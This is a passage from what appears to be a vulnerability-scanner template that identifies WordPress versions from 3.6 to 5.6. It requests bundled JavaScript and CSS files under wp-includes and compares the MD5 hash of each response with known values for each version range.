path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/datepicker.min.js" + 
matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"cfb63dc18fde53fef4d4fdc19ddfdcd6\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"82e28aae0e34a07a0b13ce604d021b14\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"499a4efa077515f0e4025141e22b0290\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2391c6781dad9871a02cca33c1782f4b\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"70b4930dc8e018f851f8530c330b1456\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c5d96ab0b66c433e5ce4c4d1038612b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tooltip.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"443f68690d84eee42cf3019071340730\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"b75d47d283918bef01b8cdcc4045511e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c841c027f1139ce197b43a9e4ea65420\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"26c741acbef3207eb8c79483cbc08dde\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"533fcffa5cae261dff515b72f5c0139a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/dialog.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"3ecd9590aac778514f4e69975ed91a62\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"24036156f5137bd484089907f52c9530\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"03468b0f0ceb0ccce25de28ffed83efd\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"d0933f1e5b9b5592dd5e219f7eba2f14\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"add449e75da55bc682631a7f9d12fafc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/draggable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"443c277789baf69c490019d59c1b36ed\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + 
dsl: + - "(\"500b56f16499ad4010c6cb1159a00ef7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b5993b66434a99eb5b6f8cdd716f19d0\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"1b571c6695d5b8dc97ff051254fa953c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"906dfc74dfca0498666bca77e5c6889e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-transfer.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"07e5b0dea800777dd2108788b56ef90b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"70d7ff2b68aa36956b1c7fa6c0b44191\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2d541c6d1e13a0f9bfbccdc6a68710af\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4adf0d942931b49ff804a3df76f91473\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-pulsate.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"bf836f20530440115a2a8487ca7021c5\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"d31b2660850bd11ed7f4118ee166f1e9\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"0d28e73bb53ab02d4951460898c8ad8c\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e68aa8b524b4726b33456011f8e08997\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a1046ab49f04a3d7eeb33d411adbeca3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/core.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"9ce4e157448487d4efe0ca538f656a71\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"204d1573e5f9ad0d0c9b61bdffe4a37b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"67314499128fc5f9b92a78e2ac93bf89\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"96ff65c925bbaf3e4e7891a7ca1f2b1f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2fea75d1bee862d18064d52a1fca3c37\" 
== md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/autocomplete.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"d0ff3eba6258651773c3a5cc909efde6\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"87848b50d8b543b6fe1a38a97a6aea5c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b44ae880533b69eb02aa8bab81bbb2a8\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"db0088d80b66d522e8f56921f2f39ff5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c07e20c3fad464dab1ed4c7b43e33709\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fade.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"9f6fd64f4f5ff5893b7b72a235246d0c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"15a40c47867106bd6f45ac103d00d929\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8a30f21e345577b420a78c5aba2b3156\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ffc8d22a420c7af0b2baec80164c9ebc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/button.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"2ce99e1ed08df351e6a58eb4b6bcbfa9\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"6e0e045d3fe4766ba1cd3ae5830f5307\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"cb7e87f8ae42aed3689546eaf9566d6c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"68fcb351d6882f64a3e5e2f3d6fd00b3\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"616085fd76fe2c4c2a09d2b94196a669\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7bced8633b0301e877db79c95101241c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-explode.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"c0df625cca418cfd803a11514a3dd1e6\" == md5(body))" + - type: dsl + name: 4.2 - 
4.5.23 + dsl: + - "(\"605955a2ff9bbd517d58d90651f730d8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"80a3c71f73734d8e64568b208b5cfd19\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2f68b680e67f09ced628d98b2bb456ff\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"07f19a11c69199b50faa6c148c99d4b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/sortable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"2896e90cc17e9abc160ed96bb86b07e3\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"0ed316ce58771b0297b783130e6b5e94\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c9f94c2964fbe89af48d431e721ee4d6\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"efa8171f2226a422003417095d8549dd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1f7ccfe2bad939d26a1360cb399aa1e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-scale.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"d57d0830652c29c3e0e301b02b6db754\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c7dce545dd7b39f2e154c7a69fe1b30f\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"bf1461a382afb5a90e22a0d7d462ff92\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"25377707ee8e989c109d24ee5adafb53\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/mouse.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"82835a8960ddd73020389dbfa45c39a0\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"e4a138275da8ed21bf8e49d9b210b884\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3b3c95f5fb16cfa309270c16992dc393\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"b317c4ccc9aa140339ad72fa27c77266\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e741e01a2efcc5372d649eb84035ac30\" 
== md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/spinner.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"3acf32da612bf35221c09394856591dc\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"b2d7a9df2f6b0f264851faf33b6ac7d6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7c2fb4ffa453c9870793dd257109b9b3\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"a597d68b588efa4b8896beea6582c62c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6b95a7525bebb6884e50f3aa0c4dcee4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-bounce.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"4bc4c97924bea4bf7b04d7b46ff4f64c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"d8967fe0305451de35920fd4fbe18d53\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"60d7f9347ab7938af5cb10ef606453f1\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"030dc5d899ab0c2191629d74281f7781\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c56e07e312d163e6c13f9cea03468890\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tabs.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"5330c83425ab1b8f67ce63f741427adb\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"4572c6f0dae66c956ef9774756800b92\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fc67555a859a12b644ff9edaf7926a96\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"9d119a515eff37751a19f95d11c0802d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"b7d1b47a2c57059631f53e42392f7955\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"61f1c4f2116e6de96e6c01488aa78144\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-shake.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 
+ dsl: + - "(\"260cbafcbcedc23348a371cb80083112\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"a0274a6716560eeaccaf0090400f7095\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ed68bc26b640e7dcaf6e32ea3d3478ed\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"52adac7c5413612aa59472d00bcd0b5c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9805977e847511fd5d0cfd0b0dfdbfd2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-highlight.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"95e8ebe62adf187fb4c3b84eb5bef821\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"65d871feccd57666ee19a3df4644a7e0\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"9b1d4283702ba049f9d88e0a75d05f81\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4eba87d378061ff9e0e53a96e96354bf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/accordion.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"334c2ffb0b086ffc0f6f192ea120f3c2\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"617307799c0ec636db3df228d57790da\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3d655185b6170d7722edad3edbd4eb26\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e89a7c428e49ea602d7ec04809663edc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"842a3a86123d41935c2d1821ee89d447\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-clip.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"c7939457e8ab231b951713475a056173\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"857396f2d8203aba1028fde0009c92d8\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e9294b5b7374f173b76b4286b53faf33\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 
"(\"9778614a5172dfe6a8babd4c86e7d3a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/resizable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"a5001032177c492cf0ff7c86bc01169f\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"3f04b22aeae2579369c558e39db6d5bf\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e2d4ab1a66c1ec7615c2e17c15c7e081\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"449c1a605e8c304774ed6336d9a953af\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5ad69e67648243390058495a8beb5535\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"3f7161cf139d5a2c5e6d34e1c0026f9d\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"1441d6a28c1e7069c1e21b757f2b6082\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b7642fa0b3ddf241b7b4ee9d62139d76\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"318747d327332bca86b5f101420c4209\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"65b229b1cbc084072342bfa5f4e1d766\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fold.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"8d365ec1b3a7ee82f93c9afd441e456c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f5854a487c21837903b3e03e5507cf52\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8785d9de96bad111926ab4d13014d21f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"42a41dbb3565969a5c8e0f0b228aeb30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-drop.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"57fe560887cac7a5b2598188463290e8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"115186cb516bf141e12b8b8c7f1c5c8d\" == 
md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"59c7df6dedd02a304f58985e7cfb8e1e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8395ce579e994aa4f9911ae86a071a46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-size.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"b00e3dfd6eebccd5ea9aeb3293d85a25\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"3a14499e6b9543cd2a85be995dab077f\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6fd6a0edced7b413d16c500d896d5e0f\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"706b0892dc2ec793f195f2a3f2402edc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"50efcc245d0569281ad367d8d1ab3745\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/slider.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"9408efe2ce5a6b4364f34cbda02f814b\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"7d09316c34df2686e1515795ef0f4cc8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4f70432f595fade3c533070299719285\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"6c55f2f9a18a80fbf2b3a59dd9e8c7f3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9aacf2600bc8e4f8a62c7fe648f4ddf7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-puff.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"fe496d6c9d63bc47854084c8b3fc20d6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"633a3e818838090cdb8f691545977ece\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"0647cd3b8da74c8c9c1fe7a317137773\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7d50405c6e2695da78ba318591244fa6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-slide.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + 
- "(\"fa23475fb01c8f4d56da98ca0c1179b5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ab6393ed31d603a7c3b3d723437726a4\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"b3efa3b4e62162ad592e8a8b483b6572\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b13b495e8d1a2b3a4301b9df1829485b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-blind.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"addbe09f173c4f1bd86d41ac5f3b4f4c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6fb2642d8eb51b75a796cb3e92e6ba7e\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"9ade4cd0f3989a69310012f671fe6f8e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9ec8b798f187fb04dd20b2c36da00b37\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/progressbar.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"b94d71da54d9b4413ffa4c7d792269c5\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"a5e9438e7bac8acb9a71ccf4741009cd\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f953a1f80de38a3aa9b33b9035d8a638\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"34c78c33e7c97e65a369bb0137d93d05\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1a9b736b90bcfdfdae5aa66a0959100e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectmenu.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"cb7db4cbaa328e395a680c78692236f0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2c771d66d39708f0b0cac4c9922113d2\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"a0934e5723eb9982df8a6b7bf07a751e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4c8c34de3de3167ca6724e0f745e3a76\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/droppable.min.js" + 
matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"debf5224c4162887d1a6e3198ed953d8\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"1a4b2271fd48cc6494bc94967e41b150\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"0871aadc0992a7c71d5b3558114438fb\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8c9c1bc0a5e940af40f55e19d39ed9a0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ee39d7ff1953b6c0b1006271bbd5cbb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"0687e33e84a860c33a3a885193a6d937\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"55349dce77921ce5ae7b0c66c0ec2e4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"2ca8d8977881d5e608aa01c45bac7dce\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"28a8a27aaaf51e9de260514ea7ddf409\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5fccff0cc3e57ff5bb1436e7a0bc2566\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8d16f9c2327813d9ebfd04769999eeac\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"a7f7bdc09331cf77b0f7b820eb59f75b\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3207ef8ba63ea7671e48d937393967e9\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"239ad0ddef90fbac27dd0697a10db8f4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9109ffc835f229e4cef66bb179a67e0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/vimeo.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"5c12dccb796dfc0f9bef9745965cf595\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"4ed19dc7687386bb9c6c172dac61f4c4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c03f1bc87e730cd0e2e069360f47b82f\" == md5(body))" + - method: 
GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/vimeo.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"4e3e1ef6029d44a9362f7ea746b87994\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"a3677881601afb0f678c2c207d850799\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"170687433986a4a559fa4f16b1d7c70e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-and-player.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"bfa6a78578b3e436a00cddf75420469a\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"16a432e33da81058ca49c643cae0c318\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0ba79ba4228a86dd0a14a72ddba4a059\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"dec8fc8727389a7b012257960f663dff\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2890d236e5e44496f045916182f54d0d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2d369dd8ffa89cd6c4d66dbdf6ccd67f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"f3b0e2379715e4ae6d15748d14a6dca1\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"cdfaf4cf4c18580773c4af4fb27ff253\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"91f08b610092a39dc11a5e328f2d215d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"a7f30f0c309921a487640a98569cba90\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"c53c2f4dd23046ce2127477792aecb20\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2b0dd7eecea03b4bdedb94ba622fdb03\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/dist/vendor/react-dom.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"c6ef74c7ec0704ff4cad3b5ec7bfa055\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"82f6e97da7739bd618e9ae38d681db71\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"22aa1f16fffcd8050495b19e49143bf1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"43e0a7d0496e085696a01339bceef3df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react-dom.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"1c4cddde3c73b3e706b6ad620582daf7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9331dc818181c1df34cc866c03bec20d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8e891f5946c8e1780e362268cb45ec8b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dcf51763fb4a654e15a4e6e7754ca5d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"ef752361755a318f70b5a3ae9cb2ed3f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6154303cf1c576b1479a67e73f93ecb8\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"f80458708d0a9701b76d741d35b6722f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"edf56a42bca6b565bf7dfcbd8ffc221a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"47f592e79ad9ce36525bec84a9ce239f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1427ebb68b9631c7f3b0526cb513aac7\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"f4ea9307973c76798b7a18f1ddfa700f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bff81f643a904be8a3d144f7a8142c24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check.css" + matchers: + - type: 
